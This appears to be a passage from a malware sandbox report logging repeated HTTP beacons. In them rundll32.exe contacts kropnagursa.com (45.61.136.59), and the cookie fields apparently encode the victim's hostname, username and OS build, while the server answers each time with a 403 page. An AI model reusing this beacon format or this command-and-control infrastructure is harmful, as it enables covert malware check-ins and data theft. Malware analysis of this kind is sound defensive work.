                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            4192.168.2.44970045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:16:59.511133909 CET2113OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:16:59.679017067 CET2113INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:16:59 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            40192.168.2.44973645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:24.409076929 CET2159OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:24.577055931 CET2159INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:24 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            41192.168.2.44973745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:24.899821997 CET2160OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:25.067810059 CET2160INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:24 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            42192.168.2.44973845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:25.453165054 CET2161OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:25.618283987 CET2162INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:25 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            43192.168.2.44973945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:26.111138105 CET2163OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:26.276031017 CET2163INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:26 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            44192.168.2.44974045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:26.608488083 CET2164OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:26.773062944 CET2164INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:26 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            45192.168.2.44974145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:27.100450039 CET2165OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:27.265141010 CET2166INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:27 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            46192.168.2.44974245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:27.680891037 CET2166OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:27.847971916 CET2167INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:27 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            47192.168.2.44974345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:28.352555990 CET2168OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:28.517409086 CET2168INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:28 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                            Feb 2, 2023 21:17:28.665155888 CET2168OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:28.831981897 CET2169INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:28 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            48192.168.2.44974445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:29.149054050 CET2170OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:29.316328049 CET2170INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:29 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            49192.168.2.44974545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:29.636655092 CET2171OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:29.801702023 CET2171INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:29 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            5192.168.2.44970145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:00.085071087 CET2114OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:00.249947071 CET2114INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:00 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            50192.168.2.44974645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:30.298135042 CET2172OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:30.463089943 CET2173INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:30 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            51192.168.2.44974745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:30.978414059 CET2173OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:31.146071911 CET2174INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            52192.168.2.44974845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:31.517669916 CET2175OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:31.682838917 CET2175INHTTP/1.1 403 Forbidden
